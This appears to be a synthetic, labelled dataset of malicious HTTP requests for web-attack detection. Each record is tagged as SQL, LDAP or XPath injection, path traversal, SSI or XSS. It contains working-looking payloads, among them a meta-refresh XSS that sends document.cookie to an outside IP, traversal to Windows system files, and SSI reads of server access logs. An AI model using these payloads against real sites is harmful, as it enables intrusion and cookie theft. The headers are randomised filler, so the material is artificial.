GET /ovS9INEzo/p5ae7aeT/heR.u/oDRQOBZ3rIvXyg/LROFc/Tae/tfe5eesia/ate0zpeekrdmdne/Eaha3totnev/odu.g3Uq/eeiybtpaypm.exe?nl=nslsAlkt%7E6Syt8e&tdctubt=openinnrt%3Ewsdeleteto1mn%5D&4duoZ=046&heafeoernaoeu=smailmailGW&eet=y4maSjHeneatei&odtlroc=208672&iN66iddNmtli5=yRtev&sE=h4a8sdtlrh8ae&3ih=%3Cmeta+++http-equiv++%3D%22+++refresh++%22+++++content+++%3D+++%22+++0%3Burl%3Djavascript%3A+%5Bwindow.open%28%27http%3A%2F%2F6.100.122.110%2Fetanni.php4%27%2Bdocument.cookie%29%3B%5D+%22+++%3E&5rilnzwohpwtal=4&lfOhBacrs=lWisdhhtle6M HTTP/1.1
Host: 0.74.58.8:80
Connection: ottilsT
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=5536
Client-ip: 192.143.189.93
Cookie: hel=owp-;rglgqt=rnO;BM2Hlhpmeta=;t;mnumeepGtpmrt=child xlead6s ok2t
Cookie2: $Version="7"
Date: Mon, 12 Oct 09 22:40:29 CET
ETag: W/"pbjVzqemGJN.290ZUYvt"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Mon, 12 Jun 06 10:59:26 UTC
If-Unmodified-Since: Sat, 01 Dec 07 14:52:26 UTC
If-Match: "u0m@qrPn4@Mtf@KRCl"
If-None-Match: "vJSUUNrcMV9UkX9NX"
If-Range: Sat, 27 Mar 10 22:21:08 CET
Max-Forwards: 284
MIME-Version: 0.5
Pragma: k='h'
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: NTLM MnN5OWVpc3N3cGxyc2VlaVJ5Ymp0NmVvbzlldGFlZWs=
Range: 209-45720
Referer: /ceebA/tuephUye/owtMuue/rOnprqt.htm
TE: gzip;q=0.3,trailers
Trailer: User-Agent
User-Agent: tEgreeea (sEv4.RE3qZ; hrqzKQBfd; nJ3LRIRbXI; oJbWx5A)
UA-CPU: StrongARM
UA-Disp: 212,5646,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3266x6869
Via: 7.8 www.aaeEbot2.html, 5.4 35.226.218.10, FTP/8.6 www.ehayCru6.html
Transfer-Encoding: gzip
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 4179007460908292246
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48000
Start - Id: 38381
class: LdapInjection
GET /aInW75F/hERnSNTxig8OnR9/4JX/nscZNZZSPqvAesYTM/eotEuS5t5eitviashot/lVns3uKCfWbzhR-i/96ztCOL1.aspx?agV.xSbLC2g-=15662028&Nnbeeigeiermi=%26v&sboh=34238&RkYD=ekl%29%28%26%28objectClass++%3D+luc7*%29 HTTP/1.0
Host: www.eiaae.cz:80
Connection: close
Accept: image/*;q=0.3, audio/*;q=0.3, video/*;q=0.3
Accept-Charset: cp-950, x-mac-greek
Accept-Encoding: *;q=0.7
Accept-Language: nOch-la;q=0.1, uexL-ozhnPeei, tNSllt-ebsvtM;q=0.5, znjCreag-ee, caeBopp-ktde
Cache-Control: no-store
Client-ip: 154.67.228.204
Cookie: zehit53m=u7e;woo=copylaixuo-golNNi;senrymudst=we6yaey2eluor;Rue33Nr= ndr;atouenTvve05= itdm;1co7s4f0=nph-eetoeeye
Cookie2: $Version="442"
Date: Thu, 09 Mar 06 19:39:57 CET
ETag: W/"5xPwwqiYOnhxY.G"
Expect: gatu
From: e3ig@cUsnasr.com
If-Modified-Since: Tue, 18 Sep 07 03:33:15 CET
If-Unmodified-Since: Wed, 30 May 07 24:53:44 UTC
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: *
If-Range: Mon, 01 Jan 07 08:44:26 UTC
Max-Forwards: 3
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="mn9qe5l"
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -74,-7,5-53601
Referer: http://zdmlaBs.be/u1fnsi2r/pr1n/9iiu0/heexan/tguajm.php4
TE: gzip;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: elqao/7.4
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6780x4829
Via: 4.2 www.EsitnhmE.jpeg, 5.1 155.128.205.112
Transfer-Encoding: deflate
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38381
Start - Id: 35701
class: XPathInjection
GET /qxSPcat/ec/JLXjWydivMy/nwzs2tI8U/rgfdkx4hisje61hoi/m668b.jpg?snmasEcNteheb=87432162&vrhetce4Utgto=6rhoaat+sock_stream&Mlthzb5Eg=yin3lljs&sloW4Ev=efltnens+pessock_stream9EaNa&vouOfotoy9=aiwmL1&Tsnth=47&ehErchmedssetlo=6985++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++308%3D&e1h0haueaEem=574171&5e=%5B&jRureplaceusr-=deqS%2Bey+formaccept3h5%3C%5Bo HTTP/1.0
Host: 209.76.1.121
Connection: oeueeo
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.4, identity;q=0.3, identity, deflate
Accept-Language: nf-1Loese;q=0.2, R7-ee, t5re-wa439, roi7-c;q=0.6
Cache-Control: max-age=347
Client-ip: 87.168.72.128
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="5"
Date: Tue, 03 Jun 08 09:53:39 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: aebhq
From: xcsXifnE@tneljth.ch
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Mon, 04 Apr 05 09:11:15 UTC
If-Match: *
If-None-Match: "rlzk8rqxdGrIZMUJF"
If-Range: *
Max-Forwards: 5360
MIME-Version: 4.6
Pragma: Qns=8p8b8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: http://www.ygulHi.it/jeaEotgT/dopae1/e7ixxa.js
TE: chunked,deflate;q=0.6,deflate
Trailer: Pragma
User-Agent: 3pait/6.9.1
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: 2.4 www.oatf8M.htm:3, HTTP/6.9 220.224.112.210:95972
Transfer-Encoding: gzip
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35701
Start - Id: 38782
class: LdapInjection
GET /gvone2.shtml?nshOlonm=ehpasswde&vaa4OolRHbnti=6&cBhavingRbXwRlEaccept=t&@mKOH6MFamn=9879%29%28%26%28objectClass%3D0smy%29%28%7C%28sn++++%3D+++aY%29%28cn%3DsTe++J*%29%29&uh7CW-@zM=69261&6BbetweenmetacmdeZZ9=i%28sand%3C HTTP/1.0
Host: 137.26.3.26:80
Connection: cqfs
Accept: */*;q=0.0
Accept-Charset: koi8, iso-8859-5, iso-2022-kr, x-mac-arabic;q=0.6, iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: ptuzaO='litgb'
Client-ip: 103.114.5.31
Cookie: 7-L0-a=nhw;631lRhA7d9M=Dhbmaaf;adywe=tx-AWyeRz@S;q5ldkdvo3bptl93=2412
Cookie2: $Version="919"
Date: Tue, 06 Jan 09 08:35:02 UTC
ETag: W/"saFjXR8ldmH5p5Akw0"
Expect: niBha8=isnno;es0ysfa
From: eedz@idneeachi.org
If-Modified-Since: Wed, 04 Jul 07 10:41:14 UTC
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: "9OTL3T-9Sf6cZW_om"
If-Range: "WumTLqIPh_8WEXcrbd"
Max-Forwards: 710
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM OGU0b1J0bWd2YXJlZW9lbmlXdVM0YnVvdXRrdzVzenl5bzNsaXBvOA==
Range: 777808-9828,-9730,-076
Referer: /oeaMgrIc/thllt.rar
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.4 (X11; U; Solaris 6.2; He-CH; rv:4.6.5) Gecko/87787533
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: HTTP/0.4 www.t65tumE.tiff, 4.9 15.151.136.89, 1.8 58.35.169.92
Transfer-Encoding: gzip
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38782
Start - Id: 42125
class: SqlInjection
GET /enodew5a-connectqc4WWJX-/T6/cvuEX5P3owbAnetcat2b/aph6a7ht27tet.gif?jo1nte8E=OR+++%27n2ggntE%27+++BETWEEN+%27R%27+AND++%27T%27&nreinabitbkene=pamx%27la&5f7ss=78&en3=78825&9mitoIez=918&fWnbanehedriby2=onnDvbscript&kesgnmeboiEbfy=nh1Hlitnwibiiac&3P=gk3aQHH HTTP/1.1
Host: 164.36.106.206
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7;q=0.3, koi8-r;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 29.95.16.146
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="52"
Date: Fri, 02 Oct 09 23:32:24 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: islI@rcdrtQr.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Wed, 28 Jul 04 08:29:55 CET
If-Match: *
If-None-Match: *
If-Range: "w7yxi91W5bmyIUKEaXM"
Max-Forwards: 7222
MIME-Version: 7.0
Pragma: cyr=omapefe
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth-int
Range: 80-3804,023297-91,09-
Referer: /Egiiy/ttle.cfm
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 1.1; to-ni; rv:1.2.1) Gecko/02317336
UA-CPU: MIPS
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1285x9347
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42125
Start - Id: 36039
class: PathTransversal
GET /toim0w/-1i/witut9slmeEqiiEheemr/uVg8T9k/aKhtCvZN-SOG.Cq/dbtsekne.mspx?gAVOi=14559&mI7gAleecE=xgsMwa%5Cd&@NOu63@=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: 12.90.232.255
Connection: keep-alive
Accept: audio/*;q=0.5
Accept-Charset: iso-8859-6;q=0.2, windows-1253, cp-950, iso-2022-kr
Accept-Encoding: deflate, identity;q=0.8, gzip, compress, gzip;q=0.6
Accept-Language: *
Cache-Control: max-stale=691
Client-ip: 87.93.92.255
Cookie: eenkanrersfeg=8283;hpd=asaNl;uyl7Nmu1tbbesr=21;csc6ow=tar&<7uQsfgO\tb
Cookie2: $Version="8"
Date: Tue, 11 Apr 06 18:16:57 UTC
ETag: "dqM_4UuMnTQ3BNZBkT-X"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 19 Apr 04 21:45:25 GMT
If-Unmodified-Since: Wed, 24 May 06 12:49:29 UTC
If-Match: *
If-None-Match: *
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 312
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: nizw 8I6iiEN3=seei95mG
Range: 709-485
Referer: http://arih.com/acpTnR/o8uwA/Hoes.jpg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.4 (compatible; MSIE 4.5; Windows NT; ereig0yo)
UA-CPU: PowerPC
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 745x4826
Via: FTP/4.0 185.69.198.91
Transfer-Encoding: nmmute; ihiem6cs=aes3ofsm
Upgrade: tztr/1.1, esid/8.4, 6ktsdr/4.4, Ipqst/0.4
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36039
Start - Id: 49636
class: XPathInjection
GET /h1OaUGK/maehhqsiolhde/qeieci0TtsIaeiumh/uM84/kTWPxYQ7GKR9/lTbkF8fEBIBg4/nHzRhgqf642@xElu5bwT/e4rEtad4ylice4anAcWh.mdb?siotat=aq_7LO%40-t&qfqCQuVu=kbslinkstrs&KR82Hshutdownq=dl7SeR8ase&alEslomsnnO=44&eatmetS2bEro=61&ic=%25uh+script%2Feiar&tw2mhewm=hg-21WFRLG&Ii1gamos7=0072&myefosha0rnhn=5laso%27+++++or++++6+%3C++++count%28path%2Fchild%3A%3A*%29++++or+++%27gyato%27++++%3D++++%27 HTTP/1.1
Host: www.rSLbss.com
Connection: If0t
Accept: application/*, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5hlr-oyOte, wcc4arvt-e
Cache-Control: no-cache
Client-ip: 168.133.90.250
Cookie: sl0htIx=t;einh9ke6tenht=ldop2tiframe4l;eae=uet\;EqRe=264832
Cookie2: $Version="94"
Date: Fri, 01 Aug 08 13:37:20 GMT
ETag: W/"7xooxmITc3kLOw7U-@"
Expect: roznzstA
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Sat, 05 May 07 16:23:39 CET
If-Unmodified-Since: Fri, 26 Dec 08 08:35:01 CET
If-Match: *
If-None-Match: "UgGV5njN3sD5TNibQaMP"
If-Range: "0fy946-0WLQMaM@N5I"
Max-Forwards: 276
MIME-Version: 1.5
Pragma: t2trt6=vsaT
Proxy-Authorization: NTLM bTdJZm9od3JhZXRidXJsMGJlbWtkemQ3RXVyZWVzanJkbHNnbjI=
Authorization: Buae mojX=Miuace
Range: 79860-827,72-9963,513431-
Referer: http://grniukec.uk/m4oee/rtdr/ictaeetn/ezilr5s.dll
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: ropisrs (hEB9XU; hE._7R)
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3223x940
Via: 5.1 www.wogc.jpeg
Transfer-Encoding: compress
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 524 www.ufdAk.gif "c7tvlttbVv" 
X-Forwarded-For: 89.198.76.55
X-Serial-Number: 903451462
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49636
Start - Id: 39767
class: SSI
GET /o.rLVQvnc0/lse7/bz52GPfJxu-OQHiO_/tK@9h4dAc/LV09KPLjyV72iHN/sR.Ak.jpg?yidSdOgestdtS=%3C%21--+++++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&WernsuJit=%40u+i&mrytn=9325297786&hosoiI=wbeiA%3Cairrsny&qcleeaunjessrro=n2K6%405yzKeQ&seocmshvz=oiiImaqperlasabnnph-a&m0ohhroeot=7meretgadNm7Dh&ChifromIc0=73&osrn=p7Dh%40vBTd6 HTTP/1.1
Host: www.turi.fr
Connection: rh7t
Accept: audio/x-wav;q=0.3
Accept-Charset: shift_jis;q=0.2, x-mac-japanese;q=0.0, gb2312, ks_c_5601-1987;q=0.6
Accept-Encoding: identity, compress;q=0.6
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 53.18.205.114
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="565"
Date: Tue, 13 Mar 07 01:40:38 UTC
ETag: W/"UOethF6tldF.k9x"
Expect: sn1i
From: inatvaj@ofn6.fr
If-Modified-Since: Sat, 24 Jan 04 05:30:51 CET
If-Unmodified-Since: Tue, 01 Jan 08 24:52:57 GMT
If-Match: "0BJsXYjYrZUQ6TdH"
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="3FB8f7FE7A2B56D1Ebe41b8aaE2dea0f"
Authorization: m3ea a8bhgit=19sesn
Range: 42-82,601-32,-86
Referer: /y4iReg/shaeiEa/zaodee/wu0on5/szclistt.tar
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/4.7 (X11; U; Solaris 4.2; yx-is; rv:1.1.4) Gecko/91314393
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5615x413
Via: 9.6 www.tiyeTta.htm
Transfer-Encoding: deflate
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39767
Start - Id: 35374
class: SqlInjection
GET /mmTp1F/t5YWLzMfUN6i0oaJHg/sX0hs_rAeoddvc-l5/tGo/r02u@1SY9J/ey3ea0DmlehirtQtie/u0I3BWYYWm5-EY89V_/oo2zj/htaccesp/nuIaIuc1ZeX.cfm?0kDw=u&9S0mtu=tEkv4rFDf&DFcopy-MBit=n4Eet&2eanq4yi=te1E-nf&rjoeefoA=9156&eg8seby41qY=zati%27&smnidymf=efyhuaft&ihajoqq9xq8Hss=913&sesfn=509798&hifn6=select+++ioee++++from+++ALL_USERS HTTP/1.1
Host: www.fsIeta4r.com
Connection: keep-alive
Accept: audio/basic;q=0.7, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 246.233.58.195
Cookie: otrothhHebn=hkhtg9mnc2r8'i;svmanedd=iwap
Cookie2: $Version="80"
Date: Sun, 03 May 09 08:49:12 GMT
ETag: "9t_6VgnTeO2lMOGPcbH"
Expect: eeosm=3uereXt
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Sat, 14 Mar 09 18:39:41 UTC
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "05OAYHFGhZ3BynDR"
If-None-Match: *
If-Range: *
Max-Forwards: 2201
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: Basic eTR5eGFPcnc6YjJlaWxp
Authorization: NTLM bm9VMzFwc0ltcWVhVWVIaG0wZ3N0QXN0ZWFudHU5ZTR0ZWJDb2dyU09pa3RyM2M=
Range: 187-
Referer: /kImyse.wmn
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.8 (X11; U; Open BSD i386 5.1; qe-5l; rv:4.8.1) Gecko/98765579
UA-Pixels: 1597x768
Via: 5.6 104.233.219.156
Transfer-Encoding: compress
Warning: 961 www.Nezio.shtml "yirNnnptNp5er5wpa6a" "Sun, 10 Jul 05 04:38:42 GMT"
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35374
Start - Id: 45996
class: PathTransversal
POST /aTcrnHldMvnnrnddc/ich7nRlIh4dg.html? HTTP/1.1
Content-Length: 215
Content-Language: yx51o,6tjr1
Content-Encoding: compress
Content-Location: http://eztpn.fr/bAeeolay/ni7haeG/woEvLee.mdb
Content-MD5: ZkJ1aFNzbmtudHlTcmh0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Dec 06 21:07:07 UTC
Last-Modified: Mon, 26 Sep 05 06:24:46 CET
Host: www.emzdetLta.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip, identity;q=0.6, gzip
Accept-Language: *;q=0.0
Cache-Control: min-fresh=3284
Client-ip: 243.169.251.155
Cookie: etcJlqtDsRi=(i2;qnUF=..........................WINNTsystem.ini;aasn=esovd
Date: Tue, 19 Apr 05 04:44:56 GMT
ETag: ".OJXtIXHMTDLuwgpLDY0"
Expect: 100-continue
From: h4leog@lneuabul.uk
If-Modified-Since: Sun, 09 May 04 09:50:32 UTC
If-Unmodified-Since: Tue, 17 Aug 04 10:30:57 GMT
If-Match: *
If-None-Match: "ILy_djoiX7VOzWt0"
If-Range: *
Max-Forwards: 6
MIME-Version: 8.3
Pragma: no-cache
Authorization: wei9 ecsazo=ohenn
Range: 44665-,552-,1-
Referer: http://www.hrlacepi.net/r6e6hHec.txt
TE: gzip,chunked;q=0.6,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: ohiextyskr (oBJc1HWi)
UA-CPU: Sparc
Via: 5.1 www.EtalOhfg.shtml, FTP/3.3 www.f2Hin.gif:90
Transfer-Encoding: deflate
Upgrade: vysgb/3.2, qh8Atn/8.2
Warning: 820 150.29.252.130 "mcb2NdatgsdhTOusu2o" 
X-Serial-Number: 30022157350213308791
~~~~~: ~~~~~~~~~~~~~~~~~

eahnlieumi=91530657&jlR=d6tdinaO8&Dfyh=8&WfencUntn=rqrhm&MgJ5BQG0eHS=access_log0e8tuneaccess_logE+b fdernrn&neh2=iKQ&7LMHs.copyadmin4d=29773&Oncemjk=i9q5Q.&aa1eha=x6ez4BF&flnehsrs=57&ueunPhij=e'z1iweey47l6zgfyIa

End - Id: 45996
Start - Id: 47076
class: XSS
GET /fcvmssmTeRjerea/i7hwGJoham5D3Gx8s/e2zw9ZoI/wenctnaoqdOa8E54sp/gMxsa0KZw@cJ./-c_-f/dcrtdeir.bin?Iref=125145&swma=teci&4p_b2e6g=e%7Crlibs+io%3Es%3Dsshutdowndeue%2Fs&wtwe=19545&iGs=%3Cobject+++classid+++%3D++%22++clsid%3A...%22+++++codebase++%3D+++%22+++javascript%3A++%5Balert%28%27dcleOs9%27%29%3B%5D+++%22++%3E HTTP/1.1
Host: www.spsOton.gov
Connection: cbe5sE
Accept: application/*, audio/x-wav;q=0.7, video/*
Accept-Charset: windows-1250;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: tgru9ra-l, nk-fanvcah, 9e-ecieo
Cache-Control: no-transform
Client-ip: 25.88.59.6
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="2"
Date: Sun, 27 May 07 20:24:51 GMT
ETag: W/"qivQOJMh@tYyao0_E"
Expect: yshaae=hl6e2eC
From: ea8Dl2@Editdvt.it
If-Modified-Since: Mon, 18 Sep 06 11:19:36 UTC
If-Unmodified-Since: Tue, 07 Sep 04 17:58:02 CET
If-Match: "Dri8@JuS0nmwkLViD"
If-None-Match: *
If-Range: Wed, 17 Jun 09 01:10:28 GMT
Max-Forwards: 111
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Nnphc2l0b2hlbWVJc2k2eGh0cmUyYThvb3NUcndzZXJj
Range: 44535-
Referer: http://Is6ctLa.uk/hxIsOele/scpoeipt/aiiisb6e/tucR8tzi/eocRA.jsp
TE: trailers
Trailer: Pragma
User-Agent: tonssh/8.7.4.9
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: rar/9.8 239.128.120.38, FTP/9.7 www.caih.htm
Transfer-Encoding: compress
Upgrade: dgs8Uh/8.4, anv/0.9
Warning: 930 www.rhrotp.css "oS5uoH2eunannrpi" 
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47076
Start - Id: 39742
class: SSI
GET /1Bqlaoe/if5mnreuhuiewcud.php3?_.j5KgoCsL7z=hraHn%2Fni&tBtisxm9Ee=h&enats=eLIw&bws=%3C%21--++++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&4cnh=ikhucee1gotatsokg4&wjadzeiwsE=6505&ae5db=dMSTJZAgI8c&.0a@DkZ_2Xx=14&tqfYeriaa5u=ge&ybtsq=x+l4eustrttnnxx&ejYPl0DPTl=er5ny+2e6Sts1&6o2goorul=a6enah7 HTTP/1.0
Host: 236.7.254.81:0433
Connection: close
Accept: image/jpeg, image/*, video/mpeg;q=0.6
Accept-Charset: windows-1257, x-mac-chinesesimp;q=0.7, windows-1250;q=0.3, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 127.62.226.109
Cookie: lrmoaenbdlUe=91;hrfoldwu=7;Lese7liwrh=feiframeelboot.inilen1omhha
Cookie2: $Version="7"
Date: Sat, 18 Jun 05 23:22:58 CET
ETag: "tYCCtqQXAuY.j2b@k7Gs"
Expect: hs1el
From: n4tbla@ol8e.st
If-Modified-Since: Sat, 18 Oct 08 22:43:15 CET
If-Unmodified-Since: Tue, 11 Sep 07 03:56:29 GMT
If-Match: "3y6Fcc-W@ilXEcQNbt14"
If-None-Match: "WS-AYxw8TAVXttq"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: haxinfq=tjyluOt
Proxy-Authorization: Digest qop=auth-int
Authorization: nyks7 tHmRb8=vgc3
Range: -343,5-1
Referer: http://www.eeizt.uk/enadx/2ylgh/uwrStn/pmasB/yt5a6e.msf
TE: deflate
Trailer: Host
User-Agent: tktaAXc_1 http://www.czgefcss.com
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 930x2188
Via: 5.3 www.ofpllEa.gif
Transfer-Encoding: u0er; wtaT=elalt
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 177.241.180.13
X-Serial-Number: 43717297958345
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 39742
Start - Id: 35912
class: XPathInjection
POST /Yxn@QphpFJl8stdin6like/SvRfchainoe/ovLA0eghuxdKTY1mNch/ozXnfLYk/rTusEd/poa/rTarRhedrhut/tdiaeeyistvev0ia/be1nL6i/eKrdHxd.2cBe2.jsp? HTTP/1.1
Content-Length: 310
Content-Language: ew4mahiv,sdiitk
Content-Encoding: compress
Content-Location: /ieac/oodp/5z72oht/ri3tcaj/qinn.cgi
Content-MD5: U0VvYTRFZmU2NGh0ckhMbg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 22 Oct 08 14:16:39 CET
Host: 168.213.244.112
Connection: close
Accept: */*
Accept-Charset: x-mac-greek, windows-1250;q=0.4, euc-jp;q=0.5, windows-1254
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale=01
Client-ip: 41.49.252.78
Cookie: a1p9ameciaa5=4325555;qhRrmN=l0caiidxEaslbbwu;aitxo3=mhb;hhtelei1o= ho;eL6=191034;onw8h4e8=hte' or     path/child::node()[position()=N] or  'lA5m'   = '
Cookie2: $Version="5"
Date: Sun, 28 Aug 05 14:35:55 GMT
ETag: W/"Ze7pzXA90rEmkmiH"
Expect: 100-continue
From: 5ixneda@rqhrvad.be
If-Modified-Since: Sat, 28 Nov 09 09:36:23 UTC
If-Unmodified-Since: Tue, 04 Oct 05 22:23:20 UTC
If-Match: "r5TBTdC9Em.ih.T3Hmo."
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: a6ocet tbqE20r=l91ubeei
Authorization: Digest qop=wkSts
Referer: http://masHsbf1.de/mosw/icv5i.pdf
